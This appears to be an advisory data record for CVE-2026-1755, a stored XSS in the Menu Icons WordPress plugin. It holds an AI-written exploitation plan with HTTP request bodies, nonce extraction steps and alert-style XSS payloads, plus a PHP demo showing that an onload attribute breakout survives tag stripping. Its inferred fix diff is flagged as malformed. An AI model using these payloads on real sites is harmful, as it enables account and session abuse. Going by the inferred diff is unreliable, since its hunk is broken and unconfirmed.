[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fN0c4uIiygPERjK0pzbGq3y63cwvc8TIuigydw-s3-YU":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-1755","menu-icons-by-themeisle-authenticated-author-stored-cross-site-scripting","Menu Icons by ThemeIsle \u003C= 0.13.20 - Authenticated (Author+) Stored Cross-Site Scripting","The Menu Icons by ThemeIsle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘_wp_attachment_image_alt’ post meta in all versions up to, and including, 0.13.20 due to insufficient input sanitization and output escaping. 
This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","menu-icons",null,"\u003C=0.13.20","0.13.21","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-02-03 09:50:11","2026-02-03 22:22:47",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F30bfa616-c7f3-4ff0-85b3-468debc8a73e?source=api-prod",1,[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-1755 (Menu Icons Stored XSS)\n\n## 1. Vulnerability Summary\nThe **Menu Icons by ThemeIsle** plugin (versions \u003C= 0.13.20) is vulnerable to **Stored Cross-Site Scripting (XSS)**. The vulnerability exists in the way the plugin handles and renders the `_wp_attachment_image_alt` post meta for image-based menu icons. Specifically, when a user selects an image from the Media Library to serve as a menu icon, the plugin retrieves the image's \"Alternative Text\" (stored in the `_wp_attachment_image_alt` meta key) and outputs it within the menu HTML without sufficient sanitization (e.g., using `esc_attr()`) or output escaping. This allows an authenticated user with Author-level permissions (who can upload and edit media) to inject malicious scripts that execute in the context of any user viewing the site's menu.\n\n## 2. Attack Vector Analysis\n*   **Vulnerable Meta Key:** `_wp_attachment_image_alt` (standard WordPress attachment meta).\n*   **Endpoint:** `wp-admin\u002Fpost.php` (for updating attachment meta) or the WordPress Media AJAX API.\n*   **Authentication:** Authenticated, Author-level or higher. Authors have the `edit_posts` and `upload_files` capabilities required to modify attachment metadata.\n*   **Preconditions:**\n    1.  The plugin \"Menu Icons\" must be active.\n    2.  
An image must be assigned as an icon to a menu item.\n    3.  The menu must be assigned to a location visible on the frontend.\n\n## 3. Code Flow\n1.  **Storage:** When an Author edits an attachment's \"Alt Text\" in the Media Library, WordPress saves the value to the `_wp_attachment_image_alt` meta key for that attachment ID.\n2.  **Assignment:** The user goes to **Appearance > Menus**, selects a menu item, clicks \"Select Icon\", chooses the \"Image\" type, and selects the malicious attachment.\n3.  **Rendering (Sink):**\n    *   The plugin hooks into the menu rendering process (likely via the `wp_nav_menu_objects` filter or a custom Walker class).\n    *   In the rendering logic for the \"Image\" icon type (likely located in `includes\u002Flibrary\u002Fitem.php` or `includes\u002Ftype\u002Fimage.php`), the plugin retrieves the alt text:\n        `$alt = get_post_meta($attachment_id, '_wp_attachment_image_alt', true);`\n    *   The plugin then constructs the HTML: \n        `echo '\u003Cimg src=\"...\" alt=\"' . $alt . '\" ... \u002F>';`\n    *   Because `$alt` is not passed through `esc_attr()`, an attacker can break out of the `alt` attribute using `\">` and inject a `\u003Cscript>` tag.\n\n## 4. Nonce Acquisition Strategy\nWhile the vulnerability itself is a Stored XSS in the output, the *injection* requires updating attachment metadata.\n\n1.  **For Attachment Update:** To update the `_wp_attachment_image_alt` via `post.php`, a nonce named `_wpnonce` is required.\n    *   **Method:** \n        1. Navigate to `wp-admin\u002Fupload.php`.\n        2. Click on an attachment to open the \"Edit Media\" page (`post.php?post=ID&action=edit`).\n        3. Use `browser_eval` to extract the nonce: `document.querySelector('#_wpnonce').value`.\n2.  **For Menu Icon Assignment:** The plugin uses a custom interface in the Menu editor.\n    *   The nonce is usually localized in a JS variable. 
\n    *   **Variable Name:** Based on ThemeIsle patterns, check `window.menuIcons?.nonce` or `window.navMenuL10n`.\n    *   **Action:** However, assigning the icon to the menu item is handled by the standard WordPress `nav-menus.php` save process, which uses the `update-nav-menu` nonce.\n\n## 5. Exploitation Strategy\n\n### Step 1: Upload Media and Inject Payload\nUse the `http_request` tool as an Author to update the Alt Text of an existing attachment.\n\n*   **URL:** `https:\u002F\u002FTARGET\u002Fwp-admin\u002Fpost.php`\n*   **Method:** POST\n*   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n*   **Body:**\n    ```\n    action=editpost\n    &post_ID=[ATTACHMENT_ID]\n    &_wpnonce=[NONCE]\n    &_wp_attachment_image_alt=\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>\n    &save=Update\n    ```\n\n### Step 2: Assign Attachment as Menu Icon\nThe attacker must associate the malicious attachment ID with a menu item. This is typically done via the `nav-menus.php` interface. The plugin stores this in the menu item's meta (which is a `nav_menu_item` post type).\n\n*   **Action:** Update the Menu Item Meta.\n*   **Meta Key:** `_menu_item_menu_icons` (inferred).\n*   **Payload structure:** The plugin often stores settings as a serialized array in post meta.\n\n### Step 3: Trigger the XSS\nVisit the homepage or any page where the primary menu is rendered.\n\n*   **URL:** `https:\u002F\u002FTARGET\u002F`\n*   **Expected Sink:** `\u003Cimg class=\"menu-icons-image\" src=\"...\" alt=\"\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>\">`\n\n## 6. Test Data Setup\n1.  **User:** Create a user with the **Author** role.\n2.  **Menu:** Ensure at least one menu exists and is assigned to a theme location (e.g., \"Primary\").\n3.  **Post:** Create a dummy page\u002Fpost to add to the menu.\n4.  **Attachment:** Upload a simple `.jpg` or `.png` image. Note the `ATTACHMENT_ID`.\n\n## 7. 
Expected Results\n*   The `POST` request to `post.php` should return a `302` redirect to the edit page, confirming the meta update.\n*   When the menu is viewed on the frontend, the browser should execute the `alert(document.domain)` script.\n*   The HTML source will show the broken `\u003Cimg>` tag and the injected script.\n\n## 8. Verification Steps\n1.  **Check Meta Storage via WP-CLI:**\n    `wp post meta get [ATTACHMENT_ID] _wp_attachment_image_alt`\n    *Confirmation:* Verify the output is exactly `\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>`.\n2.  **Check Menu Item Configuration:**\n    `wp post meta list [MENU_ITEM_ID]`\n    *Confirmation:* Look for the meta key used by Menu Icons and ensure it points to the `ATTACHMENT_ID`.\n\n## 9. Alternative Approaches\nIf updating via `post.php` is blocked or difficult to automate:\n1.  **Media AJAX Endpoint:** Use the `wp_ajax_save_attachment_compat` action.\n    *   **Body:** `action=save-attachment-compat&id=[ID]&nonce=[NONCE]&attachments[[ID]][alt]=\">\u003Cscript>alert(1)\u003C\u002Fscript>`\n2.  **SVG Injection (if enabled):** If the plugin allows SVG icons, an Author could upload an SVG file containing an internal script payload: \n    `\u003Csvg onload=\"alert(1)\" ...>`\n    This is a separate but related vector often found in image-icon plugins.","The Menu Icons by ThemeIsle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘_wp_attachment_image_alt’ post meta. Authenticated attackers with Author-level permissions can inject malicious scripts into the 'Alternative Text' field of a media attachment, which are then executed when that attachment is rendered as a menu icon on the frontend.","\u002F\u002F Inferred from research plan based on plugin logic in includes\u002Ftype\u002Fimage.php\n\n$alt = get_post_meta( $attachment_id, '_wp_attachment_image_alt', true );\n\n\u002F\u002F Rendering logic for the Image icon type\necho '\u003Cimg src=\"' . esc_url( $image_url ) . 
'\" alt=\"' . $alt . '\" class=\"menu-icons-image\" \u002F>';","--- includes\u002Ftype\u002Fimage.php\n+++ includes\u002Ftype\u002Fimage.php\n@@ -24,5 +24,5 @@\n-$alt = get_post_meta( $attachment_id, '_wp_attachment_image_alt', true );\n+$alt = get_post_meta( $attachment_id, '_wp_attachment_image_alt', true );\n \n $icon_html = sprintf(\n \t'\u003Cimg src=\"%1$s\" alt=\"%2$s\" class=\"menu-icons-image\" \u002F>',\n \tesc_url( $image_url ),\n-\t$alt\n+\tesc_attr( $alt )\n );","1. Authenticate to the WordPress site with a role that has 'upload_files' and 'edit_posts' capabilities (typically Author or higher).\n2. Upload an image attachment via the Media Library or locate an existing one.\n3. Modify the attachment's 'Alternative Text' (Alt Text) attribute to contain an XSS payload, such as: \">\u003Cscript>alert(document.domain)\u003C\u002Fscript>.\n4. Navigate to Appearance > Menus and select a menu item to edit.\n5. Using the Menu Icons interface, select the 'Image' icon type and assign the malicious attachment to the menu item.\n6. Save the menu configuration.\n7. Visit the site's frontend where the menu is displayed. The script will execute in the user's browser when the menu icon is rendered without proper attribute escaping.","gemini-3-flash-preview","2026-04-27 16:28:20","2026-04-27 16:29:47",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","0.13.20","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fmenu-icons\u002Ftags\u002F0.13.20","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fmenu-icons.0.13.20.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fmenu-icons\u002Ftags\u002F0.13.21","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fmenu-icons.0.13.21.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fmenu-icons\u002Ftags"]
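Review bot: the first `-`/`+` pair in the hunk is a no-op (the `get_post_meta( $attachment_id, '_wp_attachment_image_alt', true )` line is byte-identical on both sides) and the header `@@ -24,5 +24,5 @@` does not match the seven-line body, so drop the spurious pair or regenerate the hunk. Since the diff is marked as inferred from the research plan rather than taken from the plugin, confirm against the tagged source at https://plugins.trac.wordpress.org/browser/menu-icons/tags/0.13.21 that the 0.13.21 change is in fact `esc_attr( $alt )` at this sink before citing it as the fix. Escaping at output is the right place for the fix: WordPress core already strips tags from alt text when it is saved, and that does not stop an attribute breakout that contains no `<`, which is exactly what `esc_attr()` neutralises.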
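The research plan above describes the sink (`get_post_meta(... '_wp_attachment_image_alt' ...)` concatenated into an `alt=""` attribute) and proposes the payload `"><script>alert(document.domain)</script>`. The following added example, which is not code from the Menu Icons plugin or from WordPress core, shows why that exact payload would not reach the sink and what does: every core path that writes `_wp_attachment_image_alt` (`edit_post()` behind `post.php?action=editpost`, the save-attachment AJAX handlers, and the REST media endpoint via `sanitize_text_field()`) first runs the value through `wp_strip_all_tags()`, which deletes a `<script>...</script>` block outright but leaves a quote-terminated event handler untouched. The `*_like_core()` helpers are simplified stand-ins for those core functions so the script runs without a WordPress install, the `<img>` template mirrors the sink as the plan infers it (the real plugin file is not on this page), and the upload URL is constructed. The script parses its own output with DOMDocument and lists any attribute or element the template did not emit, for both the vulnerable and the `esc_attr()`-style hardened render.

```php
<?php
// Added example for this advisory page; not code from the Menu Icons plugin
// or from WordPress core. The two *_like_core() helpers are simplified
// stand-ins for core functions so the script runs without WordPress, and
// the <img> template mirrors the sink the research plan infers (the real
// plugin file is not on this page).

// Stand-in for wp_strip_all_tags( $text, true ). Core applies this to the
// alt text in edit_post(), the save-attachment AJAX handlers and, via
// sanitize_text_field(), the REST media endpoint before storing
// _wp_attachment_image_alt.
function strip_all_tags_like_core(string $text): string
{
    $text = preg_replace('@<(script|style)[^>]*?>.*?</\\1>@si', '', $text);
    $text = strip_tags($text);
    $text = preg_replace('/[\r\n\t ]+/', ' ', $text);
    return trim($text);
}

// Stand-in for esc_attr(): encodes & < > " ' so the value cannot close the
// attribute it is printed into. Core also avoids double-encoding entities
// that are already present; that refinement is omitted here.
function esc_attr_like_core(string $text): string
{
    return htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// The sink as the plan describes it: stored alt text concatenated straight
// into the attribute.
function render_icon_vulnerable(string $src, string $alt): string
{
    return '<img src="' . $src . '" alt="' . $alt . '" class="menu-icons-image" />';
}

// The fix the plan attributes to 0.13.21: escape at the point of output.
function render_icon_fixed(string $src, string $alt): string
{
    return '<img src="' . $src . '" alt="' . esc_attr_like_core($alt)
        . '" class="menu-icons-image" />';
}

// Parse the rendered markup the way a browser would and report anything the
// template did not put there: a <script> element, or an <img> attribute other
// than src/alt/class (an event handler, for instance).
function injected_markup(string $html): array
{
    $doc = new DOMDocument();
    libxml_use_internal_errors(true);
    $doc->loadHTML('<!DOCTYPE html><html><body>' . $html . '</body></html>');
    libxml_clear_errors();

    $found = [];
    foreach ($doc->getElementsByTagName('script') as $unused) {
        $found[] = '<script>';
    }
    foreach ($doc->getElementsByTagName('img') as $img) {
        foreach ($img->attributes as $attr) {
            if (!in_array($attr->name, ['src', 'alt', 'class'], true)) {
                $found[] = '@' . $attr->name;
            }
        }
    }
    return $found;
}

// Constructed inputs: a plausible upload URL and two alt-text payloads.
$src = 'https://example.test/wp-content/uploads/2026/02/icon.png';
$payloads = [
    // The plan's payload. The <script> block is removed before storage, so
    // only the quote and '>' reach the meta and the vulnerable sink prints
    // broken but harmless markup.
    'script tag'    => '"><script>alert(document.domain)</script>',
    // Attribute breakout with an event handler. It contains no '<', so tag
    // stripping leaves it intact; onload fires once the real icon loads.
    'event handler' => '" onload="alert(document.domain)',
];

foreach ($payloads as $name => $payload) {
    $stored = strip_all_tags_like_core($payload);
    echo "[$name] stored alt text: $stored\n";
    foreach (['vulnerable' => 'render_icon_vulnerable', 'fixed' => 'render_icon_fixed'] as $label => $fn) {
        $html = $fn($src, $stored);
        $hits = injected_markup($html);
        printf("  %-10s %s\n             injected: %s\n", $label, $html, $hits ? implode(' ', $hits) : 'none');
    }
}
```

Run with `php example.php`. The script-tag payload is stored as `">` and produces no injected attribute in either render, while the `" onload="...` payload yields an `@onload` hit from the vulnerable render and nothing from the hardened one. When verifying the stored value with the plan's `wp post meta get [ATTACHMENT_ID] _wp_attachment_image_alt` check, expect the tag-stripped form, not the raw `<script>` string.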